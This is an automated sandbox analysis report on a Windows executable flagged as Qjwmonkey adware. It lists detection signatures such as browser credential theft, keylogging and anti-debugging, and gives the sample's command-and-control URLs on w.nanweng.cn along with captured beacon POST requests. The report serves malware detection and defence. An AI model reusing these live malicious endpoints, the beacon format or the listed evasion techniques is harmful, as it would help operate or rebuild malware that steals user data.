Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nv8401986_110422.exe

Overview

General Information

Sample name:nv8401986_110422.exe
Analysis ID:1583791
MD5:31549917cdc6e3f9d40a48ea5998493f
SHA1:c0f7e826645b1ba2ba1fed866992beb9de7a31df
SHA256:73f03b369e9df60c2dc97baefcdc4ba920da3a2126c873a4654e1a83510d3b87
Tags:Adwareexemalwareuser-Joker
Infos:

Detection

Qjwmonkey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Qjwmonkey
AI detected suspicious sample
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect virtual machines (IN, VMware)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SGDT)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential key logger detected (key state polling based)
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • nv8401986_110422.exe (PID: 768 cmdline: "C:\Users\user\Desktop\nv8401986_110422.exe" MD5: 31549917CDC6E3F9D40A48EA5998493F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_QjwmonkeyYara detected QjwmonkeyJoe Security
    Process Memory Space: nv8401986_110422.exe PID: 768JoeSecurity_QjwmonkeyYara detected QjwmonkeyJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.nv8401986_110422.exe.400000.0.unpackJoeSecurity_QjwmonkeyYara detected QjwmonkeyJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: nv8401986_110422.exeAvira: detected
        Antivirus detection for URL or domain
        Source: http://w.nanweng.cn:80/qy/rqAvira URL Cloud: Label: malware
        Source: http://w.nanweng.cn:80/qy/pngAvira URL Cloud: Label: malware
        Source: http://w.nanweng.cn/bqdAvira URL Cloud: Label: malware
        Source: http://w.nanweng.cn/qy/gl1Avira URL Cloud: Label: malware
        Source: http://w.nanweng.cn/qy/glfAvira URL Cloud: Label: malware
        Source: http://w.nanweng.cn:80/qy/pngsersdAvira URL Cloud: Label: malware
        Source: http://w.nanweng.cn/qy/glAvira URL Cloud: Label: malware
        Source: http://w.nanweng.cn/qy/rqhAvira URL Cloud: Label: malware
        Source: http://w.nanweng.cn/qy/pngAvira URL Cloud: Label: malware
        Source: http://w.nanweng.cn:80/qy/lqnrps0sid360softtm1689880905type20uid102e1490f0604c078f675cf9899bc6e6ver6Avira URL Cloud: Label: malware
        Multi AV Scanner detection for submitted file
        Source: nv8401986_110422.exeVirustotal: Detection: 87%Perma Link
        Source: nv8401986_110422.exeReversingLabs: Detection: 86%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
        Machine Learning detection for sample
        Source: nv8401986_110422.exeJoe Sandbox ML: detected
        Source: nv8401986_110422.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: nv8401986_110422.exeStatic PE information: certificate valid
        Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.5:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 18.244.18.122:443 -> 192.168.2.5:49725 version: TLS 1.2
        Source: Binary string: #E:\654.pdb source: nv8401986_110422.exe, 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp
        Source: Binary string: E:\654.pdb source: nv8401986_110422.exe, nv8401986_110422.exe, 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00410800 GetProcAddress,GetProcAddress,GetProcAddress,SHGetPathFromIDListW,FindFirstFileW,CoInitialize,CoCreateInstance,_wcsrchr,_wcschr,CoUninitialize,FindNextFileW,FindClose,0_2_00410800
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0048E0D0 CreateFileW,FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,CopyFileW,DeleteFileW,CreateFileW,GetFileSize,ReadFile,CloseHandle,0_2_0048E0D0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00457360 GetProcAddress,FindFirstFileW,CoInitialize,CoCreateInstance,GetProcAddress,GetProcAddress,GetProcAddress,CoUninitialize,FindNextFileW,FindClose,0_2_00457360
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior
        Source: global trafficHTTP traffic detected: POST /qy/ov HTTP/1.1Host: w.nanweng.cn Content-Length: 186 Connection:closeAccept-Language: zh-cnCache-Conbtrol:no-cacheContent-Type:application/x-www-form-urlencodedData Raw: 26 72 70 73 3d 30 26 72 65 73 69 64 3d 30 26 72 65 73 32 69 64 3d 30 26 75 69 64 3d 31 30 32 65 31 34 39 30 66 30 36 30 34 63 30 37 38 66 36 37 35 63 66 39 38 39 39 62 63 36 65 36 26 7a 69 64 3d 26 70 61 67 3d 30 26 63 31 3d 30 26 70 6e 3d 26 72 6e 3d 26 73 6f 66 74 3d 26 61 70 70 69 64 3d 31 26 73 69 64 3d 33 36 30 26 76 65 72 3d 36 2e 30 2e 30 2e 31 31 31 31 26 76 6d 3d 31 31 26 74 6d 3d 31 36 38 39 38 38 30 39 30 35 26 74 79 70 65 3d 32 30 26 73 69 67 3d 34 37 46 32 38 46 30 37 34 41 45 43 32 37 46 35 38 30 34 32 35 45 45 39 33 36 32 30 46 36 33 36 0d 0a Data Ascii: &rps=0&resid=0&res2id=0&uid=102e1490f0604c078f675cf9899bc6e6&zid=&pag=0&c1=0&pn=&rn=&soft=&appid=1&sid=360&ver=6.0.0.1111&vm=11&tm=1689880905&type=20&sig=47F28F074AEC27F580425EE93620F636
        Source: global trafficHTTP traffic detected: POST /qy/ov HTTP/1.1Host: w.nanweng.cn Content-Length: 186 Connection:closeAccept-Language: zh-cnCache-Conbtrol:no-cacheContent-Type:application/x-www-form-urlencodedData Raw: 26 72 70 73 3d 30 26 72 65 73 69 64 3d 30 26 72 65 73 32 69 64 3d 30 26 75 69 64 3d 31 30 32 65 31 34 39 30 66 30 36 30 34 63 30 37 38 66 36 37 35 63 66 39 38 39 39 62 63 36 65 36 26 7a 69 64 3d 26 70 61 67 3d 30 26 63 31 3d 30 26 70 6e 3d 26 72 6e 3d 26 73 6f 66 74 3d 26 61 70 70 69 64 3d 31 26 73 69 64 3d 33 36 30 26 76 65 72 3d 36 2e 30 2e 30 2e 31 31 31 31 26 76 6d 3d 31 31 26 74 6d 3d 31 36 38 39 38 38 30 39 30 35 26 74 79 70 65 3d 32 30 26 73 69 67 3d 34 37 46 32 38 46 30 37 34 41 45 43 32 37 46 35 38 30 34 32 35 45 45 39 33 36 32 30 46 36 33 36 0d 0a Data Ascii: &rps=0&resid=0&res2id=0&uid=102e1490f0604c078f675cf9899bc6e6&zid=&pag=0&c1=0&pn=&rn=&soft=&appid=1&sid=360&ver=6.0.0.1111&vm=11&tm=1689880905&type=20&sig=47F28F074AEC27F580425EE93620F636
        Source: global trafficHTTP traffic detected: POST /qy/ov HTTP/1.1Host: w.nanweng.cn Content-Length: 186 Connection:closeAccept-Language: zh-cnCache-Conbtrol:no-cacheContent-Type:application/x-www-form-urlencodedData Raw: 26 72 70 73 3d 30 26 72 65 73 69 64 3d 30 26 72 65 73 32 69 64 3d 30 26 75 69 64 3d 31 30 32 65 31 34 39 30 66 30 36 30 34 63 30 37 38 66 36 37 35 63 66 39 38 39 39 62 63 36 65 36 26 7a 69 64 3d 26 70 61 67 3d 30 26 63 31 3d 30 26 70 6e 3d 26 72 6e 3d 26 73 6f 66 74 3d 26 61 70 70 69 64 3d 31 26 73 69 64 3d 33 36 30 26 76 65 72 3d 36 2e 30 2e 30 2e 31 31 31 31 26 76 6d 3d 31 31 26 74 6d 3d 31 36 38 39 38 38 30 39 30 35 26 74 79 70 65 3d 32 30 26 73 69 67 3d 34 37 46 32 38 46 30 37 34 41 45 43 32 37 46 35 38 30 34 32 35 45 45 39 33 36 32 30 46 36 33 36 0d 0a Data Ascii: &rps=0&resid=0&res2id=0&uid=102e1490f0604c078f675cf9899bc6e6&zid=&pag=0&c1=0&pn=&rn=&soft=&appid=1&sid=360&ver=6.0.0.1111&vm=11&tm=1689880905&type=20&sig=47F28F074AEC27F580425EE93620F636
        Source: global trafficHTTP traffic detected: POST /qy/ov HTTP/1.1Host: w.nanweng.cn Content-Length: 186 Connection:closeAccept-Language: zh-cnCache-Conbtrol:no-cacheContent-Type:application/x-www-form-urlencodedData Raw: 26 72 70 73 3d 30 26 72 65 73 69 64 3d 30 26 72 65 73 32 69 64 3d 30 26 75 69 64 3d 31 30 32 65 31 34 39 30 66 30 36 30 34 63 30 37 38 66 36 37 35 63 66 39 38 39 39 62 63 36 65 36 26 7a 69 64 3d 26 70 61 67 3d 30 26 63 31 3d 30 26 70 6e 3d 26 72 6e 3d 26 73 6f 66 74 3d 26 61 70 70 69 64 3d 31 26 73 69 64 3d 33 36 30 26 76 65 72 3d 36 2e 30 2e 30 2e 31 31 31 31 26 76 6d 3d 31 31 26 74 6d 3d 31 36 38 39 38 38 30 39 30 35 26 74 79 70 65 3d 32 30 26 73 69 67 3d 34 37 46 32 38 46 30 37 34 41 45 43 32 37 46 35 38 30 34 32 35 45 45 39 33 36 32 30 46 36 33 36 0d 0a Data Ascii: &rps=0&resid=0&res2id=0&uid=102e1490f0604c078f675cf9899bc6e6&zid=&pag=0&c1=0&pn=&rn=&soft=&appid=1&sid=360&ver=6.0.0.1111&vm=11&tm=1689880905&type=20&sig=47F28F074AEC27F580425EE93620F636
        Source: Joe Sandbox ViewIP Address: 18.244.18.122 18.244.18.122
        Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
        Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /jquery-3.6.3.min.js HTTP/1.1Accept: */*Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: code.jquery.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /b?rn=1735914359603&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=30919B60838E69BC08808E09822668DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: */*Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: sb.scorecardresearch.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /qy/png HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 13Host: w.nanweng.cn
        Source: global trafficHTTP traffic detected: POST /qy/gl HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 331Host: w.nanweng.cn
        Source: global trafficHTTP traffic detected: POST /qy/png HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 13Host: w.nanweng.cn
        Source: global trafficHTTP traffic detected: POST /qy/gl HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 331Host: w.nanweng.cn
        Source: global trafficHTTP traffic detected: POST /qy/gl HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 331Host: w.nanweng.cn
        Source: global trafficHTTP traffic detected: POST /qy/png HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 13Host: w.nanweng.cn
        Source: global trafficHTTP traffic detected: POST /qy/png HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 13Host: w.nanweng.cn
        Source: global trafficHTTP traffic detected: POST /qy/gl HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 331Host: w.nanweng.cn
        Source: global trafficHTTP traffic detected: POST /qy/gl HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 331Host: w.nanweng.cn
        Source: global trafficHTTP traffic detected: POST /qy/png HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 13Host: w.nanweng.cn
        Source: global trafficHTTP traffic detected: POST /qy/rq HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 504Host: w.nanweng.cn
        Source: global trafficHTTP traffic detected: POST /qy/lq HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 102Host: w.nanweng.cn
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00467C10 Sleep,gethostbyname,socket,htons,connect,setsockopt,setsockopt,send,recv,closesocket,Sleep,closesocket,Sleep,Sleep,closesocket,_strstr,_strstr,0_2_00467C10
        Source: global trafficHTTP traffic detected: GET /jquery-3.6.3.min.js HTTP/1.1Accept: */*Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: code.jquery.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /b?rn=1735914359603&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=30919B60838E69BC08808E09822668DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: */*Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: sb.scorecardresearch.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: w.nanweng.cn
        Source: global trafficDNS traffic detected: DNS query: www.msn.com
        Source: global trafficDNS traffic detected: DNS query: assets.msn.com
        Source: global trafficDNS traffic detected: DNS query: c.msn.com
        Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: browser.events.data.msn.com
        Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
        Source: global trafficDNS traffic detected: DNS query: 2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com
        Source: global trafficDNS traffic detected: DNS query: 45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com
        Source: global trafficDNS traffic detected: DNS query: 238358d141a1b2850f10e9a50017a441.clo.footprintdns.com
        Source: unknownHTTP traffic detected: POST /qy/png HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 13Host: w.nanweng.cn
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://.sq
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://238358d141a1b2850f10e9a50017a441.clo.footprintdns.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://238358d141a1b2850f10e9a50017a441.clo.footprintdns.com/apc/trans.gif
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://238358d141a1b2850f10e9a50017a441.clo.footprintdns.com/apc/trans.gif?238358d141a1b2850f10e9a50
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://238358d141a1b2850f10e9a50017a441.clo.footprintdns.com/apc/trans.gifE
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com/apc/trans.gif
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3285360334.000000000B130000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3274337460.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com/apc/trans.gif?2f928570784a0da6dbd199b01
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com/apc/trans.gifQ
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com/apc/trans.gifyL
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/apc/trans.gif
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/apc/trans.gif(
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/apc/trans.gif/M
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/apc/trans.gif=
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/apc/trans.gif?45295f866ecde2b90fe5d09c7
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/apc/trans.gifU
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/apc/trans.gifg
        Source: nv8401986_110422.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: nv8401986_110422.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: nv8401986_110422.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
        Source: nv8401986_110422.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
        Source: nv8401986_110422.exeString found in binary or memory: http://cdn.fengdf.cn/youxi/index_%d_%d.htm
        Source: nv8401986_110422.exe, 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://cdn.fengdf.cn/youxi/index_%d_%d.htmThumWndClass/qy/o/qy/rq/qy/rq2procgcp=/qy/gcpcpr=/qy/cprda
        Source: nv8401986_110422.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: nv8401986_110422.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
        Source: nv8401986_110422.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: nv8401986_110422.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: nv8401986_110422.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: nv8401986_110422.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
        Source: nv8401986_110422.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fp.msedge.net/
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fp.msedge.net/r.gif?&MonitorID=AZR&rid=5F4B6DC1B0B44A0E8B9396C4B221B2F1&w3c=true&prot=http:&v
        Source: nv8401986_110422.exeString found in binary or memory: http://ocsp.digicert.com0
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
        Source: nv8401986_110422.exeString found in binary or memory: http://ocsp.digicert.com0A
        Source: nv8401986_110422.exeString found in binary or memory: http://ocsp.digicert.com0C
        Source: nv8401986_110422.exeString found in binary or memory: http://ocsp.digicert.com0O
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: nv8401986_110422.exe, 00000000.00000002.3291318128.000000000BF11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pravo.gov.ru/proxy/ips/?docbody=&link_id=2&nd=102144583&intelsearch=&lastDoc=1n
        Source: nv8401986_110422.exe, 00000000.00000003.2035873967.0000000004088000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.live.com/Web/s
        Source: nv8401986_110422.exe, 00000000.00000002.3274337460.000000000083C000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3274337460.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/&&e&&h&&h.first
        Source: nv8401986_110422.exe, 00000000.00000002.3274337460.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/X
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/bqd
        Source: nv8401986_110422.exe, 00000000.00000002.3274337460.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/o
        Source: nv8401986_110422.exe, 00000000.00000003.2035873967.000000000407F000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/qy/gl
